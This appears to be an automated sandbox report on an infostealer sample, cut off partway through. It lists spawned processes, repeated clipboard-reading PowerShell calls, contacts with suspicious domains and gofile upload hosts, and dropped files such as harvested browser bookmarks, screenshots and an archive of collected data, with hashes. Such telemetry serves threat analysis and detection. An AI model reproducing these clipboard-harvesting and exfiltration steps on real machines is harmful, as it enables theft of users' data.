
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\5d3f71723c5e464aa1a06259e50323c0 /t 1440 /p 1804

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\BackgroundTaskHost.exe

"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault52e6eeach2d99h4d8dh8d4fh8968a3b876e1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3842724958874636157,7929843078658686211,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault38459c21h7750h4fc5hb430h1194dc23eeba

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffeb42b46f8,0x7ffeb42b4708,0x7ffeb42b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,9232472314397068478,9976419592407669725,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\TestEnter.bat" "

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\ShowFormat.jpg" /ForceBootstrapPaint3D

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\mspaint.exe

"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Pictures\My Wallpaper.jpg" /ForceBootstrapPaint3D

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "

C:\Windows\system32\taskkill.exe

taskkill /f /im goosedesktop.exe

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\main.ps1"

C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe

"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\CloseGoose.bat" "

C:\Windows\system32\taskkill.exe

taskkill /f /im goosedesktop.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 nova-screen-webview.com udp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:80 www.google.com tcp
US 8.8.8.8:53 107.218.67.172.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 8.8.8.8:53 nova-sentinel.com udp
IT 185.196.9.89:443 nova-sentinel.com tcp
US 8.8.8.8:53 89.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:53 store4.gofile.io udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 ieatpoop.info udp
US 8.8.8.8:53 245.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
IT 185.196.9.97:443 ieatpoop.info tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
IT 185.196.9.97:443 ieatpoop.info tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
IT 185.196.9.97:443 ieatpoop.info tcp
IT 185.196.9.97:443 ieatpoop.info tcp
IT 185.196.9.97:443 ieatpoop.info tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
IT 185.196.9.97:443 ieatpoop.info tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
IT 185.196.9.89:443 nova-sentinel.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 97.9.196.185.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 51.178.66.33:443 api.gofile.io tcp
US 172.67.218.107:443 nova-screen-webview.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
IT 185.196.9.97:443 ieatpoop.info tcp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 172.67.218.107:443 nova-screen-webview.com tcp
US 8.8.8.8:53 43.43.201.23.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 cxcs.microsoft.net udp
BE 104.68.66.114:443 cxcs.microsoft.net tcp
BE 88.221.83.203:443 www.bing.com tcp
US 8.8.8.8:53 203.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 114.66.68.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\830fab18-4e9a-4bb1-8a24-72554fabcfc0.tmp.node

MD5 ba973fe2fa62e2bfa81c30cb0d77b2c2
SHA1 69fed56755ea90b354ae637e88b04f9568c2a8cb
SHA256 9e39235c5b07ca875e8e139ca6b29fc97205875df5c009c3854f64a5cdeef778
SHA512 867067ae3b58d10a914aefb8b9a3f9550b20f724ad6f5011d391f83f153fb9f3418ef27bc78008146b9b04657e72ebd827799fa3aff247a61b5986e83593c0cf

C:\Users\Admin\AppData\Local\Temp\26816be1-193e-4d66-974e-60bdfd02bd0f.tmp.node

MD5 56192831a7f808874207ba593f464415
SHA1 e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA256 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512 c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

C:\Users\Admin\AppData\Local\Temp\60b9b61e-2157-4d49-952c-994d811a4cc1.tmp.node

MD5 efe1f662b2b23a094b20f0a951c14b10
SHA1 9f239fbdb6ec000710bf33923d29eddf65b357c7
SHA256 04e3334cd62fc251145ac09a052b6a069634740c4b61825cce0f14a588542ec6
SHA512 50c13ee918422fdc2e6e53e67f51a4b8eb22c84dda54f5afdcadd96e9ecf000097c6beb0778511a2e5ee93130694c4a66bc8a73db614c8b6faa1a70243e9ab07

memory/3232-26-0x0000022E06C70000-0x0000022E06C92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxqbckpn.dkv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 feadc4e1a70c13480ef147aca0c47bc0
SHA1 d7a5084c93842a290b24dacec0cd3904c2266819
SHA256 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512 c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1

MD5 ede83963d9c708680b7e6a6a97115b46
SHA1 c02bcfd669e4f75f4a381d784b11f0639afc39c3
SHA256 516870000b15440f653de5ba4c2c8cc8e9ab44d96371ea2cb29a240c473954d3
SHA512 f02cbaa3a88c11d3e3cf85638087ec74a9645547be63ed6f648bec0800c5190563647d3c998da3750cb3038687495cc036c4ba28dd7994f67e7fab2357e78aae

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d460ce715a00afd56cda62e926b8b17
SHA1 3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22
SHA256 195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb
SHA512 1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969

C:\Users\Admin\AppData\Local\Temp\Ky7j15TmYMCNH4X5PK72\System\NQPTTMRM - 2024-06-11_175318.png

MD5 2e264d2ae4ddecac3b87091292ad7484
SHA1 20230e7a18394d561535a211d6d27c709bffdfde
SHA256 3d28f0e3aacfb9df81837570e49271ccb737105fe32219241796c4e21470c20b
SHA512 be32d99f09daefefd3a179203d4a1e4c5ddefd4e3395f2a492ba56b909b495ef6f92284dac722f5dc9befa58d6b593d2044bdbb63d838cfafe49a7e19fdbf9d0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\Ky7j15TmYMCNH4X5PK72\Browsers\Bookmarks.txt

MD5 78e6f792c7ee52c112ea84a3deef6d8a
SHA1 b5a77c2816161059c2dd40c81ba89ed8de385f27
SHA256 31168dff50aa6099e3ad4b4104e5d6d3ec03f94e21575d525e07f7bbbb7159f0
SHA512 3f7ed6950894cc9436d6e5e25d569de60a4667a510b95b4201fe7675ef18e26ab59cfa552a4b97b392828c864e315510e95fe5bad4a4c7cb438665d84be9aa74

C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip

MD5 564384e5f6ba350c67eff92279bb1b6d
SHA1 d5a0926a7024339062efce2956a841eea4592282
SHA256 199ecf0ae1381d1bb71d53ce5d80b74c4fd525f7efd9d1e19267f2b1f7fd5f67
SHA512 7c50d73f1004541cd64c1c40c7b5dcd65887c74cb347d2fd03cc2b519c324f0fb2116322085096628ba9fc12a68ecec2b343f0bbd320ba253b9f94c1800eaf71

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5ad057f22389d36eb38a18d31efe295b
SHA1 e8668017f1339dc8496c087295f79516dce8e9bf
SHA256 205049c83211067b8e11e2fe83e6224dc966c33fee28fc4643efa55d069b41f3
SHA512 3169c4d8d2e695debce2f47a0285c9b9b11913392f7ab9911f9530bf13ba94531bb2713becce0d616872263d6fab8097848f28894bf1594ec1e81aa20049cd2a

C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs

MD5 edf3c75d866bd1bdbc903da388aa4183
SHA1 da5760b42e012281468f8224ae97484ba7c33b0d
SHA256 251daf1d44d3e25e8684f5c261f44617cb11a1d1610a9dc2adf2250b430e4503
SHA512 cf34f6215bf41d45764d83be0c224af612bec3ee07dc840ba6cddcdf3ad251c77ba28f904561b265c516c1ac2031b96bbf41a21333400e1cc002e9bd5a3b068c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5c10ece9e67c1d50ee9b458aa8cc169a
SHA1 45fce8c44fd825126ba098ff354a53474a17f9f0
